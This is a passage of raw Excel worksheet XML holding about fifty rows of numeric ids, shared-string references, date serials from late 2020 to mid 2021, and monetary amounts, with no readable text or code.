      <c r="D2961" t="s">
        <v>12292</v>
      </c>
      <c r="E2961">
        <v>11</v>
      </c>
      <c r="F2961" t="s">
        <v>9459</v>
      </c>
      <c r="G2961" s="1">
        <v>44148</v>
      </c>
      <c r="H2961">
        <v>100000</v>
      </c>
      <c r="J2961" t="s">
        <v>12295</v>
      </c>
    </row>
    <row r="2962" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2962">
        <v>22868</v>
      </c>
      <c r="B2962">
        <v>415</v>
      </c>
      <c r="C2962" t="s">
        <v>2041</v>
      </c>
      <c r="D2962" t="s">
        <v>12292</v>
      </c>
      <c r="E2962">
        <v>11</v>
      </c>
      <c r="F2962" t="s">
        <v>2236</v>
      </c>
      <c r="G2962" s="1">
        <v>44148</v>
      </c>
      <c r="H2962">
        <v>100000</v>
      </c>
      <c r="J2962" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="2963" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2963">
        <v>22869</v>
      </c>
      <c r="B2963">
        <v>415</v>
      </c>
      <c r="C2963" t="s">
        <v>2041</v>
      </c>
      <c r="D2963" t="s">
        <v>12292</v>
      </c>
      <c r="E2963">
        <v>11</v>
      </c>
      <c r="F2963" t="s">
        <v>9527</v>
      </c>
      <c r="G2963" s="1">
        <v>44148</v>
      </c>
      <c r="H2963">
        <v>100000</v>
      </c>
      <c r="J2963" t="s">
        <v>12296</v>
      </c>
    </row>
    <row r="2964" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2964">
        <v>22870</v>
      </c>
      <c r="B2964">
        <v>415</v>
      </c>
      <c r="C2964" t="s">
        <v>2041</v>
      </c>
      <c r="D2964" t="s">
        <v>12292</v>
      </c>
      <c r="E2964">
        <v>11</v>
      </c>
      <c r="F2964" t="s">
        <v>12297</v>
      </c>
      <c r="G2964" s="1">
        <v>44148</v>
      </c>
      <c r="H2964">
        <v>100000</v>
      </c>
      <c r="J2964" t="s">
        <v>12298</v>
      </c>
    </row>
    <row r="2965" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2965">
        <v>22871</v>
      </c>
      <c r="B2965">
        <v>415</v>
      </c>
      <c r="C2965" t="s">
        <v>2041</v>
      </c>
      <c r="D2965" t="s">
        <v>12292</v>
      </c>
      <c r="E2965">
        <v>11</v>
      </c>
      <c r="F2965" t="s">
        <v>12299</v>
      </c>
      <c r="G2965" s="1">
        <v>44148</v>
      </c>
      <c r="H2965">
        <v>100000</v>
      </c>
      <c r="J2965" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="2966" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2966">
        <v>22872</v>
      </c>
      <c r="B2966">
        <v>1161</v>
      </c>
      <c r="C2966" t="s">
        <v>3769</v>
      </c>
      <c r="D2966" t="s">
        <v>12300</v>
      </c>
      <c r="E2966">
        <v>12</v>
      </c>
      <c r="F2966" t="s">
        <v>764</v>
      </c>
      <c r="G2966" s="1">
        <v>44214</v>
      </c>
      <c r="H2966">
        <v>500000</v>
      </c>
      <c r="I2966" t="s">
        <v>9550</v>
      </c>
      <c r="J2966" t="s">
        <v>12301</v>
      </c>
    </row>
    <row r="2967" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2967">
        <v>22873</v>
      </c>
      <c r="B2967">
        <v>1161</v>
      </c>
      <c r="C2967" t="s">
        <v>3769</v>
      </c>
      <c r="D2967" t="s">
        <v>12300</v>
      </c>
      <c r="E2967">
        <v>12</v>
      </c>
      <c r="F2967" t="s">
        <v>9846</v>
      </c>
      <c r="G2967" s="1">
        <v>44214</v>
      </c>
      <c r="H2967">
        <v>50000</v>
      </c>
      <c r="J2967" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="2968" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2968">
        <v>22874</v>
      </c>
      <c r="B2968">
        <v>1161</v>
      </c>
      <c r="C2968" t="s">
        <v>3769</v>
      </c>
      <c r="D2968" t="s">
        <v>12300</v>
      </c>
      <c r="E2968">
        <v>12</v>
      </c>
      <c r="F2968" t="s">
        <v>547</v>
      </c>
      <c r="G2968" s="1">
        <v>44214</v>
      </c>
      <c r="H2968">
        <v>50000</v>
      </c>
      <c r="J2968" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="2969" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2969">
        <v>22875</v>
      </c>
      <c r="B2969">
        <v>415</v>
      </c>
      <c r="C2969" t="s">
        <v>2041</v>
      </c>
      <c r="D2969" t="s">
        <v>12292</v>
      </c>
      <c r="E2969">
        <v>11</v>
      </c>
      <c r="F2969" t="s">
        <v>8913</v>
      </c>
      <c r="G2969" s="1">
        <v>44148</v>
      </c>
      <c r="H2969">
        <v>50000</v>
      </c>
      <c r="J2969" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="2970" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2970">
        <v>22876</v>
      </c>
      <c r="B2970">
        <v>5020</v>
      </c>
      <c r="C2970" t="s">
        <v>7830</v>
      </c>
      <c r="D2970" t="s">
        <v>12271</v>
      </c>
      <c r="E2970">
        <v>34</v>
      </c>
      <c r="F2970" t="s">
        <v>12302</v>
      </c>
      <c r="G2970" s="1">
        <v>44172</v>
      </c>
      <c r="H2970">
        <v>300000</v>
      </c>
      <c r="I2970" t="s">
        <v>9693</v>
      </c>
      <c r="J2970" t="s">
        <v>12303</v>
      </c>
    </row>
    <row r="2971" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2971">
        <v>22877</v>
      </c>
      <c r="B2971">
        <v>1821</v>
      </c>
      <c r="C2971" t="s">
        <v>6274</v>
      </c>
      <c r="D2971" t="s">
        <v>12022</v>
      </c>
      <c r="E2971">
        <v>14</v>
      </c>
      <c r="F2971" t="s">
        <v>9533</v>
      </c>
      <c r="G2971" s="1">
        <v>44337</v>
      </c>
      <c r="H2971">
        <v>48000</v>
      </c>
      <c r="J2971" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="2972" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2972">
        <v>22878</v>
      </c>
      <c r="B2972">
        <v>2229</v>
      </c>
      <c r="C2972" t="s">
        <v>6330</v>
      </c>
      <c r="D2972" t="s">
        <v>12304</v>
      </c>
      <c r="E2972">
        <v>16</v>
      </c>
      <c r="F2972" t="s">
        <v>132</v>
      </c>
      <c r="G2972" s="1">
        <v>44124</v>
      </c>
      <c r="H2972">
        <v>48000</v>
      </c>
      <c r="I2972" t="s">
        <v>9571</v>
      </c>
    </row>
    <row r="2973" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2973">
        <v>22880</v>
      </c>
      <c r="B2973">
        <v>1068</v>
      </c>
      <c r="C2973" t="s">
        <v>3775</v>
      </c>
      <c r="D2973" t="s">
        <v>12305</v>
      </c>
      <c r="E2973">
        <v>16</v>
      </c>
      <c r="F2973" t="s">
        <v>3777</v>
      </c>
      <c r="G2973" s="1">
        <v>44379</v>
      </c>
      <c r="H2973">
        <v>25000</v>
      </c>
      <c r="J2973" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2974" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2974">
        <v>22885</v>
      </c>
      <c r="B2974">
        <v>138</v>
      </c>
      <c r="C2974" t="s">
        <v>16469</v>
      </c>
      <c r="D2974" t="s">
        <v>16470</v>
      </c>
      <c r="E2974">
        <v>12</v>
      </c>
      <c r="F2974" t="s">
        <v>7296</v>
      </c>
      <c r="G2974" s="1">
        <v>44161</v>
      </c>
      <c r="H2974" s="3" t="s">
        <v>16262</v>
      </c>
      <c r="I2974" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2975" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2975">
        <v>22886</v>
      </c>
      <c r="B2975">
        <v>138</v>
      </c>
      <c r="C2975" t="s">
        <v>2010</v>
      </c>
      <c r="D2975" t="s">
        <v>12306</v>
      </c>
      <c r="E2975">
        <v>12</v>
      </c>
      <c r="F2975" t="s">
        <v>9438</v>
      </c>
      <c r="G2975" s="1">
        <v>44161</v>
      </c>
      <c r="H2975">
        <v>0</v>
      </c>
      <c r="I2975" t="s">
        <v>10457</v>
      </c>
    </row>
    <row r="2976" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2976">
        <v>22887</v>
      </c>
      <c r="B2976">
        <v>138</v>
      </c>
      <c r="C2976" t="s">
        <v>2010</v>
      </c>
      <c r="D2976" t="s">
        <v>12306</v>
      </c>
      <c r="E2976">
        <v>12</v>
      </c>
      <c r="F2976" t="s">
        <v>11027</v>
      </c>
      <c r="G2976" s="1">
        <v>44161</v>
      </c>
      <c r="H2976">
        <v>0</v>
      </c>
      <c r="I2976" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2977" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2977">
        <v>22888</v>
      </c>
      <c r="B2977">
        <v>138</v>
      </c>
      <c r="C2977" t="s">
        <v>2010</v>
      </c>
      <c r="D2977" t="s">
        <v>12306</v>
      </c>
      <c r="E2977">
        <v>12</v>
      </c>
      <c r="F2977" t="s">
        <v>9435</v>
      </c>
      <c r="G2977" s="1">
        <v>44161</v>
      </c>
      <c r="H2977">
        <v>0</v>
      </c>
      <c r="I2977" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2978" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2978">
        <v>22889</v>
      </c>
      <c r="B2978">
        <v>138</v>
      </c>
      <c r="C2978" t="s">
        <v>2010</v>
      </c>
      <c r="D2978" t="s">
        <v>12306</v>
      </c>
      <c r="E2978">
        <v>12</v>
      </c>
      <c r="F2978" t="s">
        <v>2236</v>
      </c>
      <c r="G2978" s="1">
        <v>44161</v>
      </c>
      <c r="H2978">
        <v>0</v>
      </c>
      <c r="I2978" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2979" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2979">
        <v>22890</v>
      </c>
      <c r="B2979">
        <v>138</v>
      </c>
      <c r="C2979" t="s">
        <v>2010</v>
      </c>
      <c r="D2979" t="s">
        <v>12306</v>
      </c>
      <c r="E2979">
        <v>12</v>
      </c>
      <c r="F2979" t="s">
        <v>1746</v>
      </c>
      <c r="G2979" s="1">
        <v>44161</v>
      </c>
      <c r="H2979">
        <v>0</v>
      </c>
      <c r="I2979" t="s">
        <v>10853</v>
      </c>
    </row>
    <row r="2980" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2980">
        <v>22891</v>
      </c>
      <c r="B2980">
        <v>1162</v>
      </c>
      <c r="C2980" t="s">
        <v>3746</v>
      </c>
      <c r="D2980" t="s">
        <v>12307</v>
      </c>
      <c r="E2980">
        <v>11</v>
      </c>
      <c r="F2980" t="s">
        <v>1746</v>
      </c>
      <c r="G2980" s="1">
        <v>44186</v>
      </c>
      <c r="H2980">
        <v>10000000</v>
      </c>
      <c r="J2980" t="s">
        <v>12308</v>
      </c>
    </row>
    <row r="2981" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2981">
        <v>22892</v>
      </c>
      <c r="B2981">
        <v>1245</v>
      </c>
      <c r="C2981" t="s">
        <v>3783</v>
      </c>
      <c r="D2981" t="s">
        <v>12309</v>
      </c>
      <c r="E2981">
        <v>29</v>
      </c>
      <c r="F2981" t="s">
        <v>945</v>
      </c>
      <c r="G2981" s="1">
        <v>44215</v>
      </c>
      <c r="H2981">
        <v>4000</v>
      </c>
      <c r="I2981" t="s">
        <v>12310</v>
      </c>
      <c r="J2981" t="s">
        <v>12311</v>
      </c>
    </row>
    <row r="2982" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2982">
        <v>22893</v>
      </c>
      <c r="B2982">
        <v>551</v>
      </c>
      <c r="C2982" t="s">
        <v>16471</v>
      </c>
      <c r="D2982" t="s">
        <v>16472</v>
      </c>
      <c r="E2982">
        <v>25</v>
      </c>
      <c r="F2982" t="s">
        <v>12313</v>
      </c>
      <c r="G2982" s="1">
        <v>44221</v>
      </c>
      <c r="H2982" s="4">
        <v>60000</v>
      </c>
      <c r="I2982" t="s">
        <v>10010</v>
      </c>
    </row>
    <row r="2983" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2983">
        <v>22894</v>
      </c>
      <c r="B2983">
        <v>551</v>
      </c>
      <c r="C2983" t="s">
        <v>2059</v>
      </c>
      <c r="D2983" t="s">
        <v>12312</v>
      </c>
      <c r="E2983">
        <v>25</v>
      </c>
      <c r="F2983" t="s">
        <v>12314</v>
      </c>
      <c r="G2983" s="1">
        <v>44221</v>
      </c>
      <c r="H2983">
        <v>60000</v>
      </c>
      <c r="I2983" t="s">
        <v>10010</v>
      </c>
    </row>
    <row r="2984" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2984">
        <v>22895</v>
      </c>
      <c r="B2984">
        <v>346</v>
      </c>
      <c r="C2984" t="s">
        <v>570</v>
      </c>
      <c r="D2984" t="s">
        <v>10396</v>
      </c>
      <c r="E2984">
        <v>13</v>
      </c>
      <c r="F2984" t="s">
        <v>3076</v>
      </c>
      <c r="G2984" s="1">
        <v>44162</v>
      </c>
      <c r="H2984">
        <v>6600000</v>
      </c>
      <c r="I2984" t="s">
        <v>12315</v>
      </c>
      <c r="J2984" t="s">
        <v>12316</v>
      </c>
    </row>
    <row r="2985" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2985">
        <v>22896</v>
      </c>
      <c r="B2985">
        <v>346</v>
      </c>
      <c r="C2985" t="s">
        <v>570</v>
      </c>
      <c r="D2985" t="s">
        <v>10396</v>
      </c>
      <c r="E2985">
        <v>13</v>
      </c>
      <c r="F2985" t="s">
        <v>9472</v>
      </c>
      <c r="G2985" s="1">
        <v>44162</v>
      </c>
      <c r="H2985">
        <v>10</v>
      </c>
      <c r="I2985" t="s">
        <v>10442</v>
      </c>
      <c r="J2985" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="2986" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2986">
        <v>22898</v>
      </c>
      <c r="B2986">
        <v>791</v>
      </c>
      <c r="C2986" t="s">
        <v>2067</v>
      </c>
      <c r="D2986" t="s">
        <v>12317</v>
      </c>
      <c r="E2986">
        <v>14</v>
      </c>
      <c r="F2986" t="s">
        <v>12318</v>
      </c>
      <c r="G2986" s="1">
        <v>44158</v>
      </c>
      <c r="H2986">
        <v>12000</v>
      </c>
      <c r="I2986" t="s">
        <v>12319</v>
      </c>
    </row>
    <row r="2987" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2987">
        <v>22900</v>
      </c>
      <c r="B2987">
        <v>346</v>
      </c>
      <c r="C2987" t="s">
        <v>570</v>
      </c>
      <c r="D2987" t="s">
        <v>10396</v>
      </c>
      <c r="E2987">
        <v>13</v>
      </c>
      <c r="F2987" t="s">
        <v>12320</v>
      </c>
      <c r="G2987" s="1">
        <v>44162</v>
      </c>
      <c r="H2987">
        <v>50</v>
      </c>
      <c r="J2987" t="s">
        <v>9481</v>
      </c>
    </row>
    <row r="2988" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2988">
        <v>22901</v>
      </c>
      <c r="B2988">
        <v>2209</v>
      </c>
      <c r="C2988" t="s">
        <v>6339</v>
      </c>
      <c r="D2988" t="s">
        <v>12321</v>
      </c>
      <c r="E2988">
        <v>30</v>
      </c>
      <c r="F2988" t="s">
        <v>10021</v>
      </c>
      <c r="G2988" s="1">
        <v>44340</v>
      </c>
      <c r="H2988">
        <v>1775</v>
      </c>
      <c r="I2988" t="s">
        <v>12322</v>
      </c>
    </row>
    <row r="2989" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2989">
        <v>22902</v>
      </c>
      <c r="B2989">
        <v>2209</v>
      </c>
      <c r="C2989" t="s">
        <v>6339</v>
      </c>
      <c r="D2989" t="s">
        <v>12321</v>
      </c>
      <c r="E2989">
        <v>30</v>
      </c>
      <c r="F2989" t="s">
        <v>12323</v>
      </c>
      <c r="G2989" s="1">
        <v>44340</v>
      </c>
      <c r="H2989">
        <v>1620</v>
      </c>
      <c r="I2989" t="s">
        <v>12322</v>
      </c>
    </row>
    <row r="2990" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2990">
        <v>22903</v>
      </c>
      <c r="B2990">
        <v>2698</v>
      </c>
      <c r="C2990" t="s">
        <v>6026</v>
      </c>
      <c r="D2990" t="s">
        <v>12324</v>
      </c>
      <c r="E2990">
        <v>16</v>
      </c>
      <c r="F2990" t="s">
        <v>6569</v>
      </c>
      <c r="G2990" s="1">
        <v>44232</v>
      </c>
      <c r="H2990">
        <v>3000</v>
      </c>
      <c r="I2990" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2991" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2991">
        <v>22904</v>
      </c>
      <c r="B2991">
        <v>2698</v>
      </c>
      <c r="C2991" t="s">
        <v>6026</v>
      </c>
      <c r="D2991" t="s">
        <v>12324</v>
      </c>
      <c r="E2991">
        <v>16</v>
      </c>
      <c r="F2991" t="s">
        <v>3673</v>
      </c>
      <c r="G2991" s="1">
        <v>44232</v>
      </c>
      <c r="H2991">
        <v>3000</v>
      </c>
      <c r="I2991" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2992" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2992">
        <v>22905</v>
      </c>
      <c r="B2992">
        <v>4958</v>
      </c>
      <c r="C2992" t="s">
        <v>7816</v>
      </c>
      <c r="D2992" t="s">
        <v>12325</v>
      </c>
      <c r="E2992">
        <v>11</v>
      </c>
      <c r="F2992" t="s">
        <v>7818</v>
      </c>
      <c r="G2992" s="1">
        <v>44210</v>
      </c>
      <c r="H2992">
        <v>10000</v>
      </c>
      <c r="I2992" t="s">
        <v>12326</v>
      </c>
      <c r="J2992" t="s">
        <v>12327</v>
      </c>
    </row>
    <row r="2993" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2993">
        <v>22906</v>
      </c>
      <c r="B2993">
        <v>5065</v>
      </c>
      <c r="C2993" t="s">
        <v>7844</v>
      </c>
      <c r="D2993" t="s">
        <v>12328</v>
      </c>
      <c r="E2993">
        <v>13</v>
      </c>
      <c r="F2993" t="s">
        <v>12329</v>
      </c>
      <c r="G2993" s="1">
        <v>44145</v>
      </c>
      <c r="H2993">
        <v>42000</v>
      </c>
      <c r="I2993" t="s">
        <v>12330</v>
      </c>
    </row>
    <row r="2994" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2994">
        <v>22907</v>
      </c>
      <c r="B2994">
        <v>1307</v>
      </c>
      <c r="C2994" t="s">
        <v>3754</v>
      </c>
      <c r="D2994" t="s">
        <v>12331</v>
      </c>
      <c r="E2994">
        <v>11</v>
      </c>
      <c r="F2994" t="s">
        <v>5434</v>
      </c>
      <c r="G2994" s="1">
        <v>44168</v>
      </c>
      <c r="H2994">
        <v>10000</v>
      </c>
      <c r="J2994" t="s">
        <v>11146</v>
      </c>
    </row>
    <row r="2995" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2995">
        <v>22908</v>
      </c>
      <c r="B2995">
        <v>1307</v>
      </c>
      <c r="C2995" t="s">
        <v>3754</v>
      </c>
      <c r="D2995" t="s">
        <v>12331</v>
      </c>
      <c r="E2995">
        <v>11</v>
      </c>
      <c r="F2995" t="s">
        <v>512</v>
      </c>
      <c r="G2995" s="1">
        <v>44168</v>
      </c>
      <c r="H2995">
        <v>10000</v>
      </c>
      <c r="J2995" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="2996" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2996">
        <v>22909</v>
      </c>
      <c r="B2996">
        <v>1307</v>
      </c>
      <c r="C2996" t="s">
        <v>3754</v>
      </c>
      <c r="D2996" t="s">
        <v>12331</v>
      </c>
      <c r="E2996">
        <v>11</v>
      </c>
      <c r="F2996" t="s">
        <v>9217</v>
      </c>
      <c r="G2996" s="1">
        <v>44168</v>
      </c>
      <c r="H2996">
        <v>100000</v>
      </c>
      <c r="J2996" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="2997" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2997">
        <v>22910</v>
      </c>
      <c r="B2997">
        <v>1307</v>
      </c>
      <c r="C2997" t="s">
        <v>3754</v>
      </c>
      <c r="D2997" t="s">
        <v>12331</v>
      </c>
      <c r="E2997">
        <v>11</v>
      </c>
      <c r="F2997" t="s">
        <v>9483</v>
      </c>
      <c r="G2997" s="1">
        <v>44168</v>
      </c>
      <c r="H2997">
        <v>10000</v>
      </c>
      <c r="J2997" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="2998" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2998">
        <v>22911</v>
      </c>
      <c r="B2998">
        <v>1307</v>
      </c>
      <c r="C2998" t="s">
        <v>3754</v>
      </c>
      <c r="D2998" t="s">
        <v>12331</v>
      </c>
      <c r="E2998">
        <v>11</v>
      </c>
      <c r="F2998" t="s">
        <v>9454</v>
      </c>
      <c r="G2998" s="1">
        <v>44168</v>
      </c>
      <c r="H2998">
        <v>10000</v>
      </c>
      <c r="J2998" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="2999" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2999">
        <v>22912</v>
      </c>
      <c r="B2999">
        <v>4944</v>
      </c>
      <c r="C2999" t="s">
        <v>7570</v>
      </c>
      <c r="D2999" t="s">
        <v>12332</v>
      </c>
      <c r="E2999">
        <v>5</v>
      </c>
      <c r="F2999" t="s">
        <v>7572</v>
      </c>
      <c r="G2999" s="1">
        <v>44127</v>
      </c>
      <c r="H2999">
        <v>60000</v>
      </c>
      <c r="I2999" t="s">
        <v>12333</v>
      </c>
      <c r="J2999" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3000" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3000">
        <v>22914</v>
      </c>
      <c r="B3000">
        <v>4922</v>
      </c>
      <c r="C3000" t="s">
        <v>7865</v>
      </c>
      <c r="D3000" t="s">
        <v>12334</v>
      </c>
      <c r="E3000">
        <v>33</v>
      </c>
      <c r="F3000" t="s">
        <v>9585</v>
      </c>
      <c r="G3000" s="1">
        <v>44126</v>
      </c>
      <c r="H3000">
        <v>1500</v>
      </c>
      <c r="I3000" t="s">
        <v>12335</v>
      </c>
      <c r="J3000" t="s">
        <v>10191</v>
      </c>
    </row>
    <row r="3001" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3001">
        <v>22915</v>
      </c>
      <c r="B3001">
        <v>4922</v>
      </c>
      <c r="C3001" t="s">
        <v>7865</v>
      </c>
      <c r="D3001" t="s">
        <v>12334</v>
      </c>
      <c r="E3001">
        <v>33</v>
      </c>
      <c r="F3001" t="s">
        <v>9590</v>
      </c>
      <c r="G3001" s="1">
        <v>44126</v>
      </c>
      <c r="H3001">
        <v>1500</v>
      </c>
      <c r="I3001" t="s">
        <v>12335</v>
      </c>
      <c r="J3001" t="s">
        <v>10191</v>
      </c>
    </row>
    <row r="3002" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3002">
        <v>22916</v>
      </c>
      <c r="B3002">
        <v>2562</v>
      </c>
      <c r="C3002" t="s">
        <v>4285</v>
      </c>
      <c r="D3002" t="s">
        <v>12336</v>
      </c>
      <c r="E3002">
        <v>13</v>
      </c>
      <c r="F3002" t="s">
        <v>11515</v>
      </c>
      <c r="G3002" s="1">
        <v>44160</v>
      </c>
      <c r="H3002">
        <v>20000000</v>
      </c>
      <c r="I3002" t="s">
        <v>9536</v>
      </c>
      <c r="J3002" t="s">
        <v>12337</v>
      </c>
    </row>
    <row r="3003" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3003">
        <v>22917</v>
      </c>
      <c r="B3003">
        <v>2562</v>
      </c>
      <c r="C3003" t="s">
        <v>4285</v>
      </c>
      <c r="D3003" t="s">
        <v>12336</v>
      </c>
      <c r="E3003">
        <v>13</v>
      </c>
      <c r="F3003" t="s">
        <v>2236</v>
      </c>
      <c r="G3003" s="1">
        <v>44160</v>
      </c>
      <c r="H3003">
        <v>10000000</v>
      </c>
      <c r="I3003" t="s">
        <v>9536</v>
      </c>
      <c r="J3003" t="s">
        <v>12337</v>
      </c>
    </row>
    <row r="3004" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3004">
        <v>22918</v>
      </c>
      <c r="B3004">
        <v>1210</v>
      </c>
      <c r="C3004" t="s">
        <v>3805</v>
      </c>
      <c r="D3004" t="s">
        <v>12338</v>
      </c>
      <c r="E3004">
        <v>8</v>
      </c>
      <c r="F3004" t="s">
        <v>12339</v>
      </c>
      <c r="G3004" s="1">
        <v>44151</v>
      </c>
      <c r="H3004">
        <v>5000000</v>
      </c>
      <c r="I3004" t="s">
        <v>12340</v>
      </c>
    </row>
    <row r="3005" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3005">
        <v>22919</v>
      </c>
      <c r="B3005">
        <v>1352</v>
      </c>
      <c r="C3005" t="s">
        <v>3812</v>
      </c>
      <c r="D3005" t="s">
        <v>12341</v>
      </c>
      <c r="E3005">
        <v>5</v>
      </c>
      <c r="F3005" t="s">
        <v>3814</v>
      </c>
      <c r="G3005" s="1">
        <v>44322</v>
      </c>
      <c r="H3005">
        <v>1000</v>
      </c>
      <c r="I3005" t="s">
        <v>9638</v>
      </c>
      <c r="J3005" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3006" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3006">
        <v>22920</v>
      </c>
      <c r="B3006">
        <v>2562</v>
      </c>
      <c r="C3006" t="s">
        <v>4285</v>
      </c>
      <c r="D3006" t="s">
        <v>10805</v>
      </c>
      <c r="E3006">
        <v>13</v>
      </c>
      <c r="F3006" t="s">
        <v>4062</v>
      </c>
      <c r="G3006" s="1">
        <v>44160</v>
      </c>
      <c r="H3006">
        <v>3373011</v>
      </c>
      <c r="I3006" t="s">
        <v>9536</v>
      </c>
      <c r="J3006" t="s">
        <v>12342</v>
      </c>
    </row>
    <row r="3007" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3007">
        <v>22921</v>
      </c>
      <c r="B3007">
        <v>5061</v>
      </c>
      <c r="C3007" t="s">
        <v>7850</v>
      </c>
      <c r="D3007" t="s">
        <v>12343</v>
      </c>
      <c r="E3007">
        <v>12</v>
      </c>
      <c r="F3007" t="s">
        <v>9437</v>
      </c>
      <c r="G3007" s="1">
        <v>44145</v>
      </c>
      <c r="H3007">
        <v>0</v>
      </c>
    </row>
    <row r="3008" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3008">
        <v>22922</v>
      </c>
      <c r="B3008">
        <v>5061</v>
      </c>
      <c r="C3008" t="s">
        <v>7850</v>
      </c>
      <c r="D3008" t="s">
        <v>12343</v>
      </c>
      <c r="E3008">
        <v>12</v>
      </c>
      <c r="F3008" t="s">
        <v>9527</v>
      </c>
      <c r="G3008" s="1">
        <v>44145</v>
      </c>
      <c r="H3008">
        <v>0</v>
      </c>
    </row>
    <row r="3009" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3009">
        <v>22923</v>
      </c>
      <c r="B3009">
        <v>5061</v>
      </c>
      <c r="C3009" t="s">
        <v>7850</v>
      </c>
      <c r="D3009" t="s">
        <v>12343</v>
      </c>
      <c r="E3009">
        <v>12</v>
      </c>
      <c r="F3009" t="s">
        <v>12344</v>
      </c>
      <c r="G3009" s="1">
        <v>44145</v>
      </c>
      <c r="H3009">
        <v>0</v>
      </c>
    </row>
    <row r="3010" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3010">
        <v>22924</v>
      </c>
      <c r="B3010">
        <v>5061</v>
      </c>
      <c r="C3010" t="s">
        <v>7850</v>
      </c>
      <c r="D3010" t="s">
        <v>12343</v>
      </c>
      <c r="E3010">
        <v>12</v>
      </c>
      <c r="F3010" t="s">
        <v>12345</v>
      </c>
      <c r="G3010" s="1">
        <v>44145</v>
      </c>
      <c r="H3010">
        <v>0</v>
      </c>
    </row>
    <row r="3011" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3011">
        <v>22925</v>
      </c>
      <c r="B3011">
        <v>5061</v>
      </c>
      <c r="C3011" t="s">
        <v>7850</v>
      </c>
      <c r="D3011" t="s">
        <v>12343</v>
      </c>
      <c r="E3011">
        <v>12</v>
      </c>
      <c r="F3011" t="s">
        <v>12346</v>
      </c>
      <c r="G3011" s="1">
        <v>44145</v>
      </c>
      <c r="H3011">
        <v>0</v>
      </c>
    </row>
    <row r="3012" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3012">
        <v>22926</v>
      </c>
      <c r="B3012">
        <v>5061</v>
      </c>
      <c r="C3012" t="s">
        <v>7850</v>
      </c>
      <c r="D3012" t="s">
        <v>12343</v>
      </c>
      <c r="E3012">
        <v>12</v>
      </c>
      <c r="F3012" t="s">
        <v>12347</v>
      </c>
      <c r="G3012" s="1">
        <v>44145</v>
      </c>
      <c r="H3012">
        <v>0</v>
      </c>
    </row>
    <row r="3013" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3013">
        <v>22927</v>
      </c>
      <c r="B3013">
        <v>5061</v>
      </c>
      <c r="C3013" t="s">
        <v>7850</v>
      </c>
      <c r="D3013" t="s">
        <v>12343</v>
      </c>
      <c r="E3013">
        <v>12</v>
      </c>
      <c r="F3013" t="s">
        <v>9722</v>
      </c>
      <c r="G3013" s="1">
        <v>44145</v>
      </c>
      <c r="H3013">
        <v>0</v>
      </c>
    </row>
    <row r="3014" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3014">
        <v>22928</v>
      </c>
      <c r="B3014">
        <v>5061</v>
      </c>
      <c r="C3014" t="s">
        <v>7850</v>
      </c>
